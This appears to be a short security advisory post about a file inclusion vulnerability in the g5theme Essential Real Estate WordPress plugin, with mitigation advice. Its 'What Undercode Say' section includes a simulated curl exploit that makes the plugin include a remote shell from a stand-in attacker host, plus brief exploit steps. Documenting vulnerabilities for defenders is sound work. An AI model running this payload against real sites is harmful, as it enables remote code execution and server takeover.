Listen to this Post
How the CVE Works
The vulnerability arises due to improper sanitization of user-supplied input in file inclusion functions (include, require) in g5theme Essential Real Estate. An attacker can manipulate file paths to include arbitrary local or remote PHP files, leading to remote code execution (RCE). By crafting a malicious request with a manipulated filename parameter, the attacker forces the server to execute PHP code from an external source or sensitive local files (e.g., /etc/passwd). This exploit is possible due to insufficient validation of dynamic file inclusion paths in versions up to 5.2.1.
DailyCVE Form
Platform: g5theme Essential Real Estate
Version: β€ 5.2.1
Vulnerability: PHP LFI/RFI
Severity: Critical
Date: 07/02/2025
Prediction: Patch by 08/15/2025
What Undercode Say
Check vulnerable versions wp plugin list --field=name,version | grep "essential-real-estate" Exploit PoC (simulated) curl -X GET "http://target/wp-content/plugins/essential-real-estate/includes/file.php?path=http://attacker.com/shell.txt" Mitigation command (temporary) chmod -R 750 /wp-content/plugins/essential-real-estate/
How Exploit
- Craft HTTP request with malicious `path` parameter.
- Force inclusion of remote PHP shell.
- Gain RCE via uploaded web shell.
Protection from this CVE
- Update to patched version post-5.2.1.
- Disable remote file includes (
allow_url_include=Off). - Implement input sanitization for file operations.
Impact
- Full server compromise.
- Data leakage (e.g., database credentials).
- Unauthorized plugin/modification.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
